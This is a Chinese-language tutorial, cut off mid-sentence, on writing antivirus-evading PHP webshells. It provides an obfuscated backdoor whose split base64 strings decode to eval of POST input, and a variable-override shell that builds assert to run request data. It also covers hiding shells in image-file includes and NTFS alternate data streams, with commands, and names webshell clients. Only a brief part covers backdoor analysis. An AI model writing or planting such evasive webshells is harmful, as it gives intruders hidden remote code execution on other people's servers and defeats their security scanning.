13.免查杀脚本木马编写

免查杀木马编写的方法：
把木马创建成函数，运行时调用函数、在线加密、组合法、变量覆盖

1.把木马创建成函数，运行时调用函数。

<?php 
$mt="JF9QT1N"; 
$ojj="QGV2YWwo";
$hsa="UWydpMGle";
$fnx="5BeSleleddKTs=";
$zk = str_replace("d","","sdtdrd_redpdldadcde"); 
$ef = $zk("z", "", "zbazsze64_zdzeczodze"); 
$dva = $zk("p","","pcprpepaptpe_fpupnpcptpipopn"); 
$zvm = $dva('', $ef($zk("le", "", $ojj.$mt.$hsa.$fnx))); 
$zvm(); 
?>

str_replace：参数：("需要匹配的字符","替换字符","需要匹配的对象")

$zk=str_replace("d","","sdtdrd_redpdldadcde")=str_replace    // $zk=str_replace
$ef=str_replace("z", "", "zbazsze64_zdzeczodze")=base64_decode   // $ef=base64_decode
$dva=str_replace("p","","pcprpepaptpe_fpupnpcptpipopn")=create_function  //$dva=create_function

$ojj.$mt.$hsa.$fnx=QGV2YWwoJF9QT1NUWydpMGle5BeSleleddKTs=
str_replace(("le", "", "QGV2YWwoJF9QT1NUWydpMGle5BeSleleddKTs=")=QGV2YWwoJF9QT1NUWydpMG5BeSddKTs=

base64_decode("QGV2YWwoJF9QT1NUWydpMG5BeSddKTs=")=@eval($_POST['i0nAy']);
create_function('',@eval($_POST['i0nAy']);)
$zvm(); 

image.png

2.变量覆盖

<?php
$h='f';
$$h=$_REQUEST['x'];                //$$h可以理解为先解析后边这个$h，然后在进行解析，最终解析成为$f
$d='CHECK';
$$d='ass';
$$d=$CHECK.'ert';
$CHECK($f);
?>

3.组合法
变量覆盖+在线加密

4.在线加密

2 后门分析

后门分析的方法：关键字定位(通过对代码进行分析)、网络通信(f12）、使用wsexplorer进行抓包。

1.webshell
webshell常常被称为匿名用户（入侵者）通过网站端口对网站服务器的某种程度上操作的权限。也可以成为网站后门。

抓取软件数据包的软件是wsexplorer.

webshell免杀的方法：
1.文件包含(可以将木马后缀改为jpg,写一个php代码包含这个jpg文件。)
2.通过ntfs交换数据流文件实现文件隐藏。(可以使用软件okfiugenn进行删除数据流文件。)
例子1. echo xxx >>test.txt :webshell.php (创建数据流文件，内容是保存到webshell.php中且隐藏。)
dir /r 查看数据流文件

例子2. notepad muma.php //使用记事本创建一句话木马
type muma.php >>test.txt:muma.php //创建新的交换流文件

数据流文件的访问方法：(不能直接被访问)
1.可以通过包含文件执行数据流文件，在使用菜刀(冰蝎，蚁剑)进行连接。

image.png

或者使用手工进行执行。

image.png

2.直接在注册表